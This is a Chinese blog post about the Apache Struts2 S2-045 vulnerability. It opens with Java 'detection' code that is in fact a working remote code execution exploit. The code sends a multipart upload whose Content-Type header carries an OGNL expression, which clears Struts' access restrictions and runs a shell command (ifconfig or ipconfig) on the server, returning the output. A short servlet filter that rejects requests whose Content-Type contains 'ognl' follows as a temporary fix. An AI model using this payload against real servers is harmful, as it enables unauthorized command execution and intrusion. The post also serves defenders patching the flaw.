struts2 s2-045漏洞检测 &临时解决方案

struts2 漏洞检测代码      （文件上传代码和 exce命令来均自网络 懒得自己写）      public static String upload(String url,String filePath){        String fdfsPath = "";        try {            DefaultHttpClient httpclient = new DefaultHttpClient();            HttpPost httppost = new HttpPost(url);            File file = new File(filePath);            String name = file.getName();            InputStream in = new FileInputStream(file);            MultipartEntity reqEntity = new MultipartEntity();            InputStreamBody inputStreamBody = new InputStreamBody(in,name);            StringBody fileNam = new StringBody(name);            StringBody dateFlag = new StringBody("20160122152301");            StringBody datumType = new StringBody("0");            StringBody uploadWay = new StringBody("0");            StringBody userId = new StringBody("0538");            StringBody tenderId = new StringBody("2315");            StringBody metrialsType = new StringBody("25");            StringBody ip = new StringBody("0.0.0.1");            StringBody driverName = new StringBody("huawei");            StringBody systemVersion = new StringBody("djf");            StringBody position = new StringBody("信息路38",  Charset.forName("utf8"));             reqEntity.addPart("datums", inputStreamBody);            reqEntity.addPart("fileName", fileNam);            reqEntity.addPart("dateFlag", dateFlag);            reqEntity.addPart("datumType", datumType);            reqEntity.addPart("uploadWay", uploadWay);            reqEntity.addPart("userId", userId);            reqEntity.addPart("tenderId", tenderId);            reqEntity.addPart("metrialsType", metrialsType);            reqEntity.addPart("ip", ip);            reqEntity.addPart("driverName", driverName);            reqEntity.addPart("systemVersion", systemVersion);            reqEntity.addPart("position", position);      //linux           // httppost.addHeader("Content-Type", "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}");              //windows    httppost.addHeader("Content-Type", "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ipconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}");             httppost.addHeader("User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36");            HttpResponse response = httpclient.execute(httppost);            int statusCode = response.getStatusLine().getStatusCode();            if(statusCode == HttpStatus.SC_OK){                System.out.println("服务器正常响应.....");                HttpEntity resEntity = response.getEntity();                System.out.println(EntityUtils.toString(resEntity));//httpclient自带的工具类读取返回数据                System.out.println(resEntity.getContent());                EntityUtils.consume(resEntity);            }else{             System.out.println(HttpStatus.getStatusText(statusCode));            }        } catch (Exception e) {            e.printStackTrace();        }        System.out.println("结束....");        return "";    }   public static void main(String args[]) throws IOException { System.out.println("开始...."); upload("http://www.xxx.cn/website/index.do","E:\\www\\index.txt");  } ------------------------------------------------------------------------------------------------ 临时解决办法 ForbiddenAccessFilter.java public class ForbiddenAccessFilter extends OncePerRequestFilter {  protected void doFilterInternal(HttpServletRequest request, HttpServletResponse response, FilterChain chain) throws ServletException, IOException { String contentType=request.getContentType(); if(contentType!=null&&contentType.indexOf("ognl")!=-1){   System.out.println(contentType); return; }else{   chain.doFilter(request, response); } }   } web.xml 配置 <filter> <filter-name>forbiddenAccessFilter</filter-name> <filter-class>com.ahtec.webapp.filters.ForbiddenAccessFilter</filter-class> </filter> <filter-mapping> <filter-name>forbiddenAccessFilter</filter-name> <url-pattern>/*</url-pattern>

</filter-mapping>

--------------------------------------------------------------------------------------------------

求打赏

 qq:308377998